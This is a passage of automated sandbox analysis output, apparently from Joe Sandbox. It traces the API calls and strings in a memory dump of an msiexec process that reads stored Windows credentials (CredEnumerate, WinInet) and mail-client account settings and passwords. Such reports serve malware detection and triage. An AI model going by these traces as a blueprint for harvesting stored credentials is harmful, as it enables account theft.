                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$Library$FreeLoad
                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                      • API String ID: 2449869053-4258758744
                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                      APIs
                      • wcsstr.MSVCRT ref: 0040426A
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                      • strchr.MSVCRT ref: 004042F6
                      • strlen.MSVCRT ref: 0040430A
                      • sprintf.MSVCRT ref: 0040432B
                      • strchr.MSVCRT ref: 0040433C
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                      • String ID: %s@gmail.com$www.google.com
                      • API String ID: 3866421160-4070641962
                      • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                      • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                      APIs
                      • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                      • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                      • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                      • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                      • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                      • memset.MSVCRT ref: 004097BD
                      • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                      • String ID: TranslatorName$TranslatorURL$general$strings
                      • API String ID: 1035899707-3647959541
                      • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                      • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                      • API String ID: 2360744853-2229823034
                      • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                      • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                      APIs
                      • strchr.MSVCRT ref: 004100E4
                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                      • _mbscat.MSVCRT ref: 0041014D
                      • memset.MSVCRT ref: 00410129
                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                      • memset.MSVCRT ref: 00410171
                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                      • _mbscat.MSVCRT ref: 00410197
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                      • String ID: \systemroot
                      • API String ID: 912701516-1821301763
                      • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                      • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                      APIs
                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                      • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                      • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                      Strings
                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FromStringUuid$FreeTaskmemcpy
                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                      • API String ID: 1640410171-2022683286
                      • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                      • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                      • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                      • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                      APIs
                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$strlen
                      • String ID: -journal$-wal$immutable$nolock
                      • API String ID: 2619041689-3408036318
                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                      APIs
                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                      • wcslen.MSVCRT ref: 0040874A
                      • wcsncmp.MSVCRT ref: 00408794
                      • memset.MSVCRT ref: 0040882A
                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                      • wcschr.MSVCRT ref: 0040889F
                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                      • String ID: J$Microsoft_WinInet
                      • API String ID: 3318079752-260894208
                      • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                      • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                      APIs
                      • memset.MSVCRT ref: 004037EB
                      • memset.MSVCRT ref: 004037FF
                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                      • strchr.MSVCRT ref: 0040386E
                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                      • strlen.MSVCRT ref: 00403897
                      • sprintf.MSVCRT ref: 004038B7
                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                      • String ID: %s@yahoo.com
                      • API String ID: 2240714685-3288273942
                      • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                      • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                      APIs
                      • memcpy.MSVCRT(?,?,?), ref: 004108C3
                      • CoTaskMemFree.COMBASE(?), ref: 004108D2
                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                      • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                      • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                      Strings
                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FreeFromStringTaskUuidmemcpy
                      • String ID: 220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F
                      • API String ID: 2208953623-202910704
                      • Opcode ID: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                      • Instruction ID: d39aacb0d07447bcfd979039f79cad875a94fb0475638bd6baea4f5a046d65b4
                      • Opcode Fuzzy Hash: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                      • Instruction Fuzzy Hash: 6B2192B391411DAAEF11AF61DD40EEF3BACEF15354F004023F956E6211E6B8D981CBA5
                      APIs
                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                      • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                      • API String ID: 888011440-2039793938
                      • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                      • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                      APIs
                      Strings
                      • cannot ATTACH database within transaction, xrefs: 0042E966
                      • database is already attached, xrefs: 0042EA97
                      • too many attached databases - max %d, xrefs: 0042E951
                      • unable to open database: %s, xrefs: 0042EBD6
                      • out of memory, xrefs: 0042EBEF
                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                      • database %s is already in use, xrefs: 0042E9CE
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                      • API String ID: 1297977491-2001300268
                      • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                      • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                      • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                      • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                      APIs
                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                      • strchr.MSVCRT ref: 0040327B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfileStringstrchr
                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                      • API String ID: 1348940319-1729847305
                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                      APIs
                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                      • API String ID: 3510742995-3273207271
                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                      APIs
                      • memset.MSVCRT ref: 0040F567
                      • memset.MSVCRT ref: 0040F57F
                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                      • String ID:
                      • API String ID: 78143705-3916222277
                      • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                      • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                      APIs
                      • memset.MSVCRT ref: 0040F84A
                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                      • LocalFree.KERNEL32(?), ref: 0040F92C
                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                      • String ID: Creds$ps:password
                      • API String ID: 2290531041-1872227768
                      • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                      • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                      • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                      • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbscpy$sprintfstrchrstrlen
                      • String ID: %s@gmail.com
                      • API String ID: 3902205911-4097000612
                      • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                      • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                      APIs
                      • memset.MSVCRT ref: 004094C8
                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                      • memset.MSVCRT ref: 0040950C
                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                      • _strcmpi.MSVCRT ref: 00409531
                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                      • String ID: sysdatetimepick32
                      • API String ID: 3411445237-4169760276
                      • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                      • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                      APIs
                      • memset.MSVCRT ref: 00403504
                      • memset.MSVCRT ref: 0040351A
                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                      • _mbscat.MSVCRT ref: 0040356D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbscatmemset$_mbscpystrlen
                      • String ID: InstallPath$Software\Group Mail$fb.dat
                      • API String ID: 632640181-966475738
                      • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                      • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                      APIs
                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                      • GetSysColor.USER32(0000000F), ref: 0040B472
                      • DeleteObject.GDI32(?), ref: 0040B4A6
                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: MessageSend$DeleteImageLoadObject$Color
                      • String ID:
                      • API String ID: 3642520215-0
                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                      APIs
                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                      • GetDC.USER32(00000000), ref: 004072FB
                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
